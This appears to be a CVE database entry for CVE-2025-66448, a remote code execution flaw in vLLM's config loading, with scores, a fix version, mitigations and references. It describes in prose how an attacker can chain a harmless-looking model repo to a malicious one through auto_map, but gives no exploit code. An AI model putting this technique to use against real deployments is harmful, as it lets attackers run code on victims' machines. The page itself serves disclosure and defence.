7.1
HIGH CVSS 3.1
CVE-2025-66448
vLLM vulnerable to remote code execution via transformers_utils/get_config
Description

vLLM is an inference and serving engine for large language models (LLMs). Prior to 0.11.1, vllm has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vllm loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend will silently run the backend’s code on the victim host. This vulnerability is fixed in 0.11.1.

INFO

Published Date :

Dec. 1, 2025, 11:15 p.m.

Last Modified :

Dec. 1, 2025, 11:15 p.m.

Remotely Exploit :

Yes !
Affected Products

The following products are affected by CVE-2025-66448 vulnerability. Even if cvefeed.io is aware of the exact versions of the products that are affected, the information is not represented in the table below.

No affected product recoded yet

CVSS Scores
The Common Vulnerability Scoring System is a standardized framework for assessing the severity of vulnerabilities in software and systems. We collect and displays CVSS scores from various sources for each CVE.
Score Version Severity Vector Exploitability Score Impact Score Source
CVSS 3.1 HIGH [email protected]
Solution
Update vLLM to version 0.11.1 or later to fix a remote code execution vulnerability.
  • Update vLLM to version 0.11.1 or later.
  • Verify model configurations for untrusted auto_map entries.
  • Ensure trust_remote_code is strictly enforced for all model loading.
  • Review loaded model configuration sources.
References to Advisories, Solutions, and Tools

Here, you will find a curated list of external links that provide in-depth information, practical solutions, and valuable tools related to CVE-2025-66448.

URL Resource
https://github.com/vllm-project/vllm/commit/ffb08379d8870a1a81ba82b72797f196838d0c86
https://github.com/vllm-project/vllm/pull/28126
https://github.com/vllm-project/vllm/security/advisories/GHSA-8fr4-5q9j-m8gm
CWE - Common Weakness Enumeration

While CVE identifies specific instances of vulnerabilities, CWE categorizes the common flaws or weaknesses that can lead to vulnerabilities. CVE-2025-66448 is associated with the following CWEs:

Common Attack Pattern Enumeration and Classification (CAPEC)

Common Attack Pattern Enumeration and Classification (CAPEC) stores attack patterns, which are descriptions of the common attributes and approaches employed by adversaries to exploit the CVE-2025-66448 weaknesses.

We scan GitHub repositories to detect new proof-of-concept exploits. Following list is a collection of public exploits and proof-of-concepts, which have been published on GitHub (sorted by the most recently updated).

Results are limited to the first 15 repositories due to potential performance issues.

The following list is the news that have been mention CVE-2025-66448 vulnerability anywhere in the article.

The following table lists the changes that have been made to the CVE-2025-66448 vulnerability over time.

Vulnerability history details can be useful for understanding the evolution of a vulnerability, and for identifying the most recent changes that may impact the vulnerability's severity, exploitability, or other characteristics.

  • New CVE Received by [email protected]

    Dec. 01, 2025

    Action Type Old Value New Value
    Added Description vLLM is an inference and serving engine for large language models (LLMs). Prior to 0.11.1, vllm has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vllm loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend will silently run the backend’s code on the victim host. This vulnerability is fixed in 0.11.1.
    Added CVSS V3.1 AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H
    Added CWE CWE-94
    Added Reference https://github.com/vllm-project/vllm/commit/ffb08379d8870a1a81ba82b72797f196838d0c86
    Added Reference https://github.com/vllm-project/vllm/pull/28126
    Added Reference https://github.com/vllm-project/vllm/security/advisories/GHSA-8fr4-5q9j-m8gm
EPSS is a daily estimate of the probability of exploitation activity being observed over the next 30 days. Following chart shows the EPSS score history of the vulnerability.
Vulnerability Scoring Details
Base CVSS Score: 7.1
Attack Vector
Attack Complexity
Privileges Required
User Interaction
Scope
Confidentiality Impact
Integrity Impact
Availability Impact